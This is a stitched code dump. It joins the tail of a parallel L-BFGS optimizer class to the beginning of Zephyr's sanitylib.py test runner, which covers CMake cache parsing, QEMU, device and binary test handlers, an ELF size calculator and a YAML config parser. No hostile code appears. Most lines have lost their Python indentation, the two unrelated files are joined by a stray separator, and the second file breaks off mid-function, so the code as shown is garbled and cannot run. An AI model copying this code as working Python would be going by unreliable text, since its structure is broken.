# However P_BFGS doesn't support spawn, so we revert to single process.
major, minor, _ = platform.python_version_tuple()
            if (int(major), int(minor)) >= (3, 8):
num_procs = 0
logger.warning("For MacOS, python >= 3.8, using only current process. "
"Multiple core use not supported.")
elif platform.system() == 'Windows':
num_procs = 0
logger.warning("For Windows, using only current process. "
"Multiple core use not supported.")
queue = multiprocessing.Queue()
# bounds for additional initial points in case bounds has any None values
threshold = 2 * np.pi
if variable_bounds is None:
variable_bounds = [(-threshold, threshold)] * num_vars
low = [(l if l is not None else -threshold) for (l, u) in variable_bounds]
high = [(u if u is not None else threshold) for (l, u) in variable_bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(num_vars, objective_function,
gradient_function, variable_bounds, _i_pt)
_queue.put((_sol, _opt, _nfev))
# Start off as many other processes running the optimize (can be 0)
processes = []
for _ in range(num_procs):
i_pt = aqua_globals.random.uniform(low, high) # Another random point in bounds
proc = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(proc)
proc.start()
        # While the _optimize call below runs in this process, the other processes
        # will be running too. This one uses the supplied initial point; the
        # spawned processes each use their own random point.
sol, opt, nfev = self._optimize(num_vars, objective_function,
gradient_function, variable_bounds, initial_point)
for proc in processes:
# For each other process we wait now for it to finish and see if it has
# a better result than above
proc.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
return sol, opt, nfev
def _optimize(self, num_vars, objective_function, gradient_function=None,
variable_bounds=None, initial_point=None):
super().optimize(num_vars, objective_function, gradient_function,
variable_bounds, initial_point)
approx_grad = bool(gradient_function is None)
sol, opt, info = sciopt.fmin_l_bfgs_b(objective_function, initial_point,
bounds=variable_bounds,
fprime=gradient_function,
approx_grad=approx_grad, **self._options)
return sol, opt, info['funcalls']
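# Illustrative usage sketch (not part of the module); the quadratic objective is
# just a placeholder for any callable mapping a parameter vector to a float.
# optimizer = P_BFGS(maxfun=1000, max_processes=2)
# sol, opt, nfev = optimizer.optimize(num_vars=2,
#                                     objective_function=lambda x: (x[0] - 1) ** 2 + x[1] ** 2,
#                                     initial_point=np.zeros(2))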
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import platform
import yaml
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
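# Example of how CMakeCacheEntry.from_line() behaves (illustrative values):
#   CMakeCacheEntry.from_line('CMAKE_BUILD_TYPE:STRING=Debug', 1)
#       -> CMakeCacheEntry(name=CMAKE_BUILD_TYPE, value=Debug)
#   CMakeCacheEntry.from_line('// a comment', 2) -> None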
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
        # encapsulate terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
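    # Flash the built image (via west or the build system), then monitor the
    # serial console in a background thread and collect the harness results.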
def handle(self):
out_state = "failed"
if self.suite.west_flash is not None:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
            #    This results in options.west_flash == "--board-id=42,--erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
        process execution time to approximate the time of the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
                    # We may have polled nothing because the host did not
                    # schedule the QEMU process enough CPU time during
                    # p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
        if pid:
            try:
                os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
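    # Start the monitor thread, launch QEMU through the build system, wait for
    # it to finish (or time out) and derive the final return code.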
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
                #sometimes QEMU can't handle the SIGTERM signal correctly;
                #in that case kill the QEMU process directly with SIGKILL and
                #let sanitycheck judge the test result from the console output
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
            else:
                self.returncode = proc.returncode
                logger.debug(f"No timeout, return code from qemu: {self.returncode}")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
logger.debug(f"return code from qemu: {self.returncode}")
if self.returncode != 0 or not harness.state:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
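# Estimates RAM/ROM usage of a built image by summing the sizes of known
# sections reported by "objdump -h".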
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
        'shell_root_cmds_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan",
"bt_l2cap_br_fixec_chan",
"bt_gatt_service_static",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
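    # Convert a raw YAML value to the type named by "typestr" (str, int,
    # float, bool, list[:type], set[:type] or map).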
def _cast_value(self, value, typestr):
        if isinstance(value, str):
            v = value.strip()
        else:
            v = value
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
        else:
            raise ConfigurationError(
                self.filename, "unknown type '%s'" % typestr)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
